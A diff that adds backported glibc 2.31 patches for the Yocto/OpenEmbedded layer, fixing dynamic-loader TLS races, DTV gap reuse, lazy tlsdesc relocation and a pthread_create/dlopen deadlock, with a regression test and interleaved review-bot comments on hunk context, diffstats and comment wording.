+ return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL);
+--
+2.27.0
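Review bot: The refreshed elf/dl-open.c and elf/dl-tls.c hunks have lost the function names after `@@`, which makes it hard to verify where each one lands. Two of them, `@@ -843,7 +848,12 @@` and `@@ -866,7 +876,10 @@`, rewrite the same `dtv[0].counter != GL(dl_tls_generation)` test, and the patch alone does not say which function each applies to. The slotinfo-loop hunk is numbered `@@ -687,7 +691,7 @@` here, while 0031 places the same loop at `@@ -749,12 +767,14 @@`, so at least one of the two patches applies at a sizeable offset. Regenerating the patch with git against the patched 2.31 tree would restore the function context in the hunk headers. The applied elf/dl-tls.c should also be checked by hand to confirm that each relaxed load ended up in the intended function.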
diff --git a/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
new file mode 100644
index 0000000000..f22e52ea99
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
@@ -0,0 +1,144 @@
+From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Tue, 13 Dec 2016 12:28:41 +0000
+Subject: [PATCH] elf: Add test case for [BZ #19329]
+
+Test concurrent dlopen and pthread_create when the loaded modules have
+TLS. This triggers dl-tls assertion failures more reliably than the
+nptl/tst-stack4 test.
+
+The dlopened module has 100 DT_NEEDED dependencies with TLS, they were
+reused from an existing TLS test. The number of created threads during
+dlopen depends on filesystem speed and hardware, but at most 3 threads
+are alive at a time to limit resource usage.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/Makefile | 9 ++++--
+ elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++
+ elf/tst-tls21mod.c | 1 +
+ 3 files changed, 76 insertions(+), 2 deletions(-)
+ create mode 100644 elf/tst-tls21.c
+ create mode 100644 elf/tst-tls21mod.c
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce]
+Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/Makefile b/elf/Makefile
+index d3e909637a..3241cb6046 100644
+--- a/elf/Makefile
++++ b/elf/Makefile
+@@ -201,7 +201,7 @@
+ tst-unwind-ctor tst-unwind-main tst-audit13 \
+ tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \
+ tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \
+- tst-dlopenfail-2
++ tst-dlopenfail-2 tst-tls21
+ # reldep9
+ tests-internal += loadtest unload unload2 circleload1 \
+ neededtest neededtest2 neededtest3 neededtest4 \
+@@ -312,7 +312,7 @@
+ tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \
+ tst-initlazyfailmod tst-finilazyfailmod \
+ tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \
+- tst-dlopenfailmod3 tst-ldconfig-ld-mod
++ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod
+ # Most modules build with _ISOMAC defined, but those filtered out
+ # depend on internal headers.
+ modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\
+@@ -1697,5 +1697,10 @@
+ $(objpfx)tst-dlopen-nodelete-reloc-mod16.so
+ LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed
+
++# Reuses tst-tls-many-dynamic-modules
++$(objpfx)tst-tls21: $(libdl) $(shared-thread-library)
++$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so
++$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so)
++
+ $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so
+ $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl)
+diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c
+new file mode 100644
+index 0000000000..560bf5813a
+--- /dev/null
++++ b/elf/tst-tls21.c
+@@ -0,0 +1,68 @@
++/* Test concurrent dlopen and pthread_create: BZ 19329.
++ Copyright (C) 2021 Free Software Foundation, Inc.
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <http://www.gnu.org/licenses/>. */
++
++#include <dlfcn.h>
++#include <pthread.h>
++#include <stdio.h>
++#include <stdatomic.h>
++#include <support/xdlfcn.h>
++#include <support/xthread.h>
++
++#define THREADS 10000
++
++static atomic_int done;
++
++static void *
++start (void *a)
++{
++ /* Load a module with many dependencies that each have TLS. */
++ xdlopen ("tst-tls21mod.so", RTLD_LAZY);
++ atomic_store_explicit (&done, 1, memory_order_release);
++ return 0;
++}
++
++static void *
++nop (void *a)
++{
++ return 0;
++}
++
++static int
++do_test (void)
++{
++ pthread_t t1, t2;
++ int i;
++
++ /* Load a module with lots of dependencies and TLS. */
++ t1 = xpthread_create (0, start, 0);
++
++ /* Concurrently create lots of threads until dlopen is observably done. */
++ for (i = 0; i < THREADS; i++)
++ {
++ if (atomic_load_explicit (&done, memory_order_acquire) != 0)
++ break;
++ t2 = xpthread_create (0, nop, 0);
++ xpthread_join (t2);
++ }
++
++ xpthread_join (t1);
++ printf ("threads created during dlopen: %d\n", i);
++ return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c
+new file mode 100644
+index 0000000000..206ece4fb3
+--- /dev/null
++++ b/elf/tst-tls21mod.c
+@@ -0,0 +1 @@
++int __thread x;
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
new file mode 100644
index 0000000000..a87afe3230
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
@@ -0,0 +1,180 @@
+From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001
+From: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+Date: Fri, 25 Jun 2021 10:54:12 -0300
+Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135)
+
+This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2)
+that fixes the _dl_next_tls_modid issues.
+
+This issue with 572bd547d57a patch is the DTV entry will be only
+update on dl_open_worker() with the update_tls_slotinfo() call after
+all dependencies are being processed by _dl_map_object_deps(). However
+_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since
+the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be
+wrongly reused.
+
+This patch fixes by renaming the _dl_next_tls_modid() function to
+_dl_assign_tls_modid() and by passing the link_map so it can set
+the slotinfo value so a subsequente _dl_next_tls_modid() call will
+see the entry as allocated.
+
+The intermediary value is cleared up on remove_slotinfo() for the case
+a library fails to load with RTLD_NOW.
+
+This patch fixes BZ #27135.
+
+Checked on x86_64-linux-gnu.
+
+Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com>
+---
+ elf/dl-close.c | 8 +-
+ elf/dl-load.c | 2 +-
+ elf/dl-open.c | 10 --
+ elf/dl-tls.c | 17 +--
+ elf/rtld.c | 2 +-
+ sysdeps/generic/ldsodefs.h | 4 +-
+ 6 files changed, 349 insertions(+), 33 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce]
+Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 3720e47dd1..f39001cab9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ object that wasn't fully set up. */
+ if (__glibc_likely (old_map != NULL))
+ {
+- assert (old_map->l_tls_modid == idx);
+-
+ /* Mark the entry as unused. These can be read concurrently. */
+ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
+ GL(dl_tls_generation) + 1);
+@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ /* If this is not the last currently used entry no need to look
+ further. */
+ if (idx != GL(dl_tls_max_dtv_idx))
+- return true;
++ {
++ /* There is an unused dtv entry in the middle. */
++ GL(dl_tls_dtv_gaps) = true;
++ return true;
++ }
+ }
+
+ while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0))
+diff --git a/elf/dl-load.c b/elf/dl-load.c
+index a08df001af..650e4edc35 100644
+--- a/elf/dl-load.c
++++ b/elf/dl-load.c
+@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires");
+ not set up TLS data structures, so don't use them now. */
+ || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL)))
+ /* Assign the next available module ID. */
+- l->l_tls_modid = _dl_next_tls_modid ();
++ _dl_assign_tls_modid (l);
+
+ #ifdef DL_AFTER_LOAD
+ DL_AFTER_LOAD (l);
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index a066f39bd0..d2240d8747 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()"));
+ state if relocation failed, for example. */
+ if (args.map)
+ {
+- /* Maybe some of the modules which were loaded use TLS.
+- Since it will be removed in the following _dl_close call
+- we have to mark the dtv array as having gaps to fill the
+- holes. This is a pessimistic assumption which won't hurt
+- if not true. There is no need to do this when we are
+- loading the auditing DSOs since TLS has not yet been set
+- up. */
+- if ((mode & __RTLD_AUDIT) == 0)
+- GL(dl_tls_dtv_gaps) = true;
+-
+ _dl_close_worker (args.map, true);
+
+ /* All l_nodelete_pending objects should have been deleted
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 2b5161d10a..423e380f7c 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -126,8 +126,8 @@ oom (void)
+ }
+
+
+-size_t
+-_dl_next_tls_modid (void)
++void
++_dl_assign_tls_modid (struct link_map *l)
+ {
+ size_t result;
+
+@@ -157,7 +157,11 @@ _dl_next_tls_modid (void)
+ }
+
+ if (result - disp < runp->len)
+- break;
++ {
++ /* Mark the entry as used, so any dependency see it. */
++ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l);
++ break;
++ }
+
+ disp += runp->len;
+ }
+@@ -184,17 +188,14 @@ _dl_next_tls_modid (void)
+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+ }
+
+- return result;
++ l->l_tls_modid = result;
+ }
+
+
+ size_t
+ _dl_count_modids (void)
+ {
+- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where
+- we fail to load a module and unload it leaving a gap. If we don't
+- have gaps then the number of modids is the current maximum so
+- return that. */
++ /* The count is the max unless dlclose or failed dlopen created gaps. */
+ if (__glibc_likely (!GL(dl_tls_dtv_gaps)))
+ return GL(dl_tls_max_dtv_idx);
+
+diff --git a/elf/rtld.c b/elf/rtld.c
+index e3fb2a5b2a..d733359eaf 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -1612,7 +1612,7 @@
+ /* Add the dynamic linker to the TLS list if it also uses TLS. */
+ if (GL(dl_rtld_map).l_tls_blocksize != 0)
+ /* Assign a module ID. Do this before loading any audit modules. */
+- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid ();
++ _dl_assign_tls_modid (&GL(dl_rtld_map));
+
+ /* If we have auditing DSOs to load, do it now. */
+ bool need_security_init = true;
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index 176394de4d..9c15259236 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr,
+ extern void _dl_sysdep_start_cleanup (void) attribute_hidden;
+
+
+-/* Determine next available module ID. */
+-extern size_t _dl_next_tls_modid (void) attribute_hidden;
++/* Determine next available module ID and set the L l_tls_modid. */
++extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden;
+
+ /* Count the modules with TLS segments. */
+ extern size_t _dl_count_modids (void) attribute_hidden;
+--
+2.27.0
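Review bot: The updated declaration comment in the `sysdeps/generic/ldsodefs.h` hunk, `/* Determine next available module ID and set the L l_tls_modid. */`, leaves out the second thing the function now does: in the `elf/dl-tls.c` hunk a reused gap also gets `l` stored into `slotinfo[result - disp].map`. I would word it as `/* Assign the next available TLS module ID to L->l_tls_modid; when a DTV gap is reused, also record L in that slotinfo entry so later lookups see it as allocated. */`. The patch header also still carries the summary `6 files changed, 349 insertions(+), 33 deletions(-)` although the `Comment:` line says the test hunks were removed, so the counts no longer describe this file. Only parts of `_dl_assign_tls_modid` and `remove_slotinfo` are visible in the inner hunks.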
diff --git a/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..899111b118
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,56 @@
+From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:29:23 +0000
+Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to
+relocate tlsdesc lazily, but that does not work in a BIND_NOW module
+due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at
+load time fixes this bug 27721 too.
+---
+ sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h
+index 103eee6c3f..9a876a371e 100644
+--- a/sysdeps/x86_64/dl-machine.h
++++ b/sysdeps/x86_64/dl-machine.h
+@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map,
+ }
+ else if (__glibc_likely (r_type == R_X86_64_TLSDESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++ const ElfW (Sym) *sym = &symtab[symndx];
++ const struct r_found_version *version = NULL;
+
+- td->arg = (void*)reloc;
+- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)])
+- + map->l_addr);
++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++ {
++ const ElfW (Half) *vernum =
++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ version = &map->l_versions[vernum[symndx] & 0x7fff];
++ }
++
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+ }
+ else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE))
+ {
+--
+2.27.0
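Review bot: The new comment in the `R_X86_64_TLSDESC` branch of `elf_machine_lazy_rel` does not say why a function on the lazy path now binds eagerly; the reason (lazy tlsdesc handling ran without the dlopen lock, BZ #27137) is given only in the patch description. A reader of the source alone would be helped by something like `/* TLSDESC is resolved at load time even on the lazy path: lazy resolution raced with dlopen (BZ #27137). */` in place of the current two-line comment. The function body starts and ends outside the hunk.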
diff --git a/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..ad0a1147aa
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,124 @@
+From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:40:11 +0000
+Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+On i386 the code is a bit more complicated than on x86_64 because both
+rel and rela relocs are supported.
+---
+ sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++---------------------
+ 1 file changed, 34 insertions(+), 42 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h
+index 23e9cc3bfb..590b41d8d7 100644
+--- a/sysdeps/i386/dl-machine.h
++++ b/sysdeps/i386/dl-machine.h
+@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map,
+ }
+ else if (__glibc_likely (r_type == R_386_TLS_DESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
+-
+- /* Handle relocations that reference the local *ABS* in a simple
+- way, so as to preserve a potential addend. */
+- if (ELF32_R_SYM (reloc->r_info) == 0)
+- td->entry = _dl_tlsdesc_resolve_abs_plus_addend;
+- /* Given a known-zero addend, we can store a pointer to the
+- reloc in the arg position. */
+- else if (td->arg == 0)
+- {
+- td->arg = (void*)reloc;
+- td->entry = _dl_tlsdesc_resolve_rel;
+- }
+- else
+- {
+- /* We could handle non-*ABS* relocations with non-zero addends
+- by allocating dynamically an arg to hold a pointer to the
+- reloc, but that sounds pointless. */
+- const Elf32_Rel *const r = reloc;
+- /* The code below was borrowed from elf_dynamic_do_rel(). */
+- const ElfW(Sym) *const symtab =
+- (const void *) D_PTR (map, l_info[DT_SYMTAB]);
++ const Elf32_Rel *const r = reloc;
++ /* The code below was borrowed from elf_dynamic_do_rel(). */
++ const ElfW(Sym) *const symtab =
++ (const void *) D_PTR (map, l_info[DT_SYMTAB]);
+
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
+ # ifdef RTLD_BOOTSTRAP
+- /* The dynamic linker always uses versioning. */
+- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
++ /* The dynamic linker always uses versioning. */
++ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
+ # else
+- if (map->l_info[VERSYMIDX (DT_VERSYM)])
++ if (map->l_info[VERSYMIDX (DT_VERSYM)])
+ # endif
+- {
+- const ElfW(Half) *const version =
+- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
+- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
+- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
+- &map->l_versions[ndx],
+- (void *) (l_addr + r->r_offset), skip_ifunc);
+- }
++ {
++ const ElfW(Half) *const version =
++ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
++ &map->l_versions[ndx],
++ (void *) (l_addr + r->r_offset), skip_ifunc);
++ }
+ # ifndef RTLD_BOOTSTRAP
+- else
+- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
+- (void *) (l_addr + r->r_offset), skip_ifunc);
++ else
++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
++ (void *) (l_addr + r->r_offset), skip_ifunc);
+ # endif
+- }
+ }
+ else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+ {
+@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map,
+ ;
+ else if (__glibc_likely (r_type == R_386_TLS_DESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++ const ElfW (Sym) *sym = &symtab[symndx];
++ const struct r_found_version *version = NULL;
++
++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++ {
++ const ElfW (Half) *vernum =
++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ version = &map->l_versions[vernum[symndx] & 0x7fff];
++ }
+
+- td->arg = (void*)reloc;
+- td->entry = _dl_tlsdesc_resolve_rela;
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+ }
+ else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+ {
+--
+2.27.0
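Review bot: After this change neither visible `R_386_TLS_DESC` branch refers to `_dl_tlsdesc_resolve_abs_plus_addend`, `_dl_tlsdesc_resolve_rel` or `_dl_tlsdesc_resolve_rela` any more, so those lazy resolvers may remain in the loader as unreachable code unless another patch in the series removes them. If they are kept on purpose, a header line such as `Comment: Lazy tlsdesc resolver entry points are left in place; only their use from elf_machine_lazy_rel/rela is removed.` would make that explicit. In the `rel` branch the new comment "Always initialize TLS descriptors completely at load time" sits above the `# ifdef RTLD_BOOTSTRAP` block rather than next to the `elf_machine_rel` calls it describes. Both functions continue outside the hunks.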
diff --git a/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
new file mode 100644
index 0000000000..7a10131bad
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
@@ -0,0 +1,276 @@
+From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 15 Sep 2021 15:16:19 +0100
+Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ
+ #28357]
+
+The fix for bug 19329 caused a regression such that pthread_create can
+deadlock when concurrent ctors from dlopen are waiting for it to finish.
+Use a new GL(dl_load_tls_lock) in pthread_create that is not taken
+around ctors in dlopen.
+
+The new lock is also used in __tls_get_addr instead of GL(dl_load_lock).
+
+The new lock is held in _dl_open_worker and _dl_close_worker around
+most of the logic before/after the init/fini routines. When init/fini
+routines are running then TLS is in a consistent, usable state.
+In _dl_open_worker the new lock requires catching and reraising dlopen
+failures that happen in the critical section.
+
+The new lock is reinitialized in a fork child, to keep the existing
+behaviour and it is kept recursive in case malloc interposition or TLS
+access from signal handlers can retake it. It is not obvious if this
+is necessary or helps, but avoids changing the preexisting behaviour.
+
+The new lock may be more appropriate for dl_iterate_phdr too than
+GL(dl_load_write_lock), since TLS state of an incompletely loaded
+module may be accessed. If the new lock can replace the old one,
+that can be a separate change.
+
+Fixes bug 28357.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c | 6 ++
+ elf/dl-open.c | 35 ++++++++-
+ elf/dl-support.c | 7 ++
+ elf/dl-tls.c | 16 ++---
+ elf/rtld.c | 1 +
+ sysdeps/nptl/fork.c | 3 +
+ sysdeps/generic/ldsodefs.h | 9 ++-
+ 10 files changed, 235 insertions(+), 12 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5]
+Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 93ff5c96e9..cfe0f1c0c9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -551,6 +551,9 @@
+ size_t tls_free_end;
+ tls_free_start = tls_free_end = NO_TLS_OFFSET;
+
++ /* Protects global and module specitic TLS state. */
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
+ /* We modify the list of loaded objects. */
+ __rtld_lock_lock_recursive (GL(dl_load_write_lock));
+
+@@ -786,6 +789,9 @@
+ GL(dl_tls_static_used) = tls_free_start;
+ }
+
++ /* TLS is cleaned up for the unloaded modules. */
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
+ #ifdef SHARED
+ /* Auditing checkpoint: we have deleted all objects. */
+ if (__glibc_unlikely (do_audit))
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 5295e931b0..6ea5dd2457 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -57,6 +57,9 @@
+ (non-negative). */
+ unsigned int original_global_scope_pending_adds;
+
++ /* Set to true if the end of dl_open_worker_begin was reached. */
++ bool worker_continue;
++
+ /* Original parameters to the program and the current environment. */
+ int argc;
+ char **argv;
+@@ -473,7 +473,7 @@
+ }
+
+ static void
+-dl_open_worker (void *a)
++dl_open_worker_begin (void *a)
+ {
+ struct dl_open_args *args = a;
+ const char *file = args->file;
+@@ -747,6 +747,36 @@
+ if (mode & RTLD_GLOBAL)
+ add_to_global_resize (new);
+
++ args->worker_continue = true;
++}
++
++static void
++dl_open_worker (void *a)
++{
++ struct dl_open_args *args = a;
++
++ args->worker_continue = false;
++
++ {
++ /* Protects global and module specific TLS state. */
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
++ struct dl_exception ex;
++ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args);
++
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
++ if (__glibc_unlikely (ex.errstring != NULL))
++ /* Reraise the error. */
++ _dl_signal_exception (err, &ex, NULL);
++ }
++
++ if (!args->worker_continue)
++ return;
++
++ int mode = args->mode;
++ struct link_map *new = args->map;
++
+ /* Run the initializer functions of new objects. Temporarily
+ disable the exception handler, so that lazy binding failures are
+ fatal. */
+diff --git a/elf/dl-support.c b/elf/dl-support.c
+index 02e2ed72f5..d99c1f1d62 100644
+--- a/elf/dl-support.c
++++ b/elf/dl-support.c
+@@ -219,6 +219,13 @@
+ list of loaded objects while an object is added to or removed from
+ that list. */
+ __rtld_lock_define_initialized_recursive (, _dl_load_write_lock)
++/* This lock protects global and module specific TLS related data.
++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++ accessed and when TLS related relocations are processed for a
++ module. It was introduced to keep pthread_create accessing TLS
++ state that is being set up. */
++__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock)
+
+
+ #ifdef HAVE_AUX_VECTOR
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index d554ae4497..9260d2d696 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -443,7 +443,7 @@
+ size_t maxgen = 0;
+
+ /* Protects global dynamic TLS related state. */
+- __rtld_lock_lock_recursive (GL(dl_load_lock));
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+
+ /* Check if the current dtv is big enough. */
+ if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+@@ -517,7 +517,7 @@
+ listp = listp->next;
+ assert (listp != NULL);
+ }
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+
+ /* The DTV version is up-to-date now. */
+ dtv[0].counter = maxgen;
